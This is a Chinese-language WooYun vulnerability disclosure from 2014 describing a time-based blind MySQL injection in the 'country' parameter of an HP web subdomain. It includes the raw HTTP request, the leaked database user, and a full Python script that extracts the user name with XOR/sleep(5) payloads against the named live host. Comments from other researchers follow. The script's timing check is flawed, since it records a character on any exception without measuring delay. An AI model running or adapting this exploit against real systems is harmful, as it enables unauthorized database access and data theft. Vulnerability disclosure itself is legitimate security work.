缺陷编号:WooYun-2014-088431
漏洞标题:惠普又一站点MySQL注射(附验证脚本)
相关厂商:惠普
漏洞作者:lijiejie
提交时间:2014-12-24 14:01
公开时间:2015-02-07 14:02
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
2014-12-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-07: 厂商已经主动忽略漏洞,细节向公众公开
惠普又一站点MySQL注射(附验证脚本)
注入点:
1 2 3 4 5 6 7 8 9 |
GET /hub.php?country=aaa&language=US HTTP/1.1<br> X-Requested-With: XMLHttpRequest<br> Referer: https://h41183.www4.hp.com<br> Cookie: PHPSESSID=jqkhjokslqfg8d4j4j0kdc8r7i1o90eh<br> Host: h41183.www4.hp.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36<br> Accept: */* |
参数country可注入。MySQL time blind.
猜解user(),得到:
1 |
[email protected] |
验证python脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
#encoding=gbk<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {<br> 'Cookie': '',<br> 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',<br> }payloads = list(string.ascii_lowercase)<br> for i in range(0,10):<br> payloads.append(str(i))<br> payloads += ['@','_', '.']print 'start to retrive MySQL user:'<br> user = ''<br> for i in range(1,20):<br> for payload in payloads:<br> try:<br> conn = httplib.HTTPSConnection('h41183.www4.hp.com', timeout=10)<br> rand_num = str(random.random())<br> s = "123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb" % (i, ord(payload) )<br> conn.request(method='GET',<br> url='/hub.php?country=' + urllib.quote(s),<br> headers = headers)<br> start_time = time.time()<br> html_doc = conn.getresponse().read()<br> conn.close()<br> print '.',<br> except:<br> user += payload<br> print '\n[in progress]', user<br> breakprint '\n[Done]MySQL user is', user |
过滤
未能联系到厂商或者厂商积极拒绝
注入小王子,三连发
@猪猪侠 上次见到猪猪侠的风采,大侠果然威武! 🙂
@lijiejie 我关注你的微博了,注入牛,加个QQ呗。
都开始HP了。我靠猪猪侠都关注你了!
@wefgod 我也关注你了啊
@猪猪侠 真的假的,受宠若惊
原文连接
的情况下转载,若非则不得使用我方内容。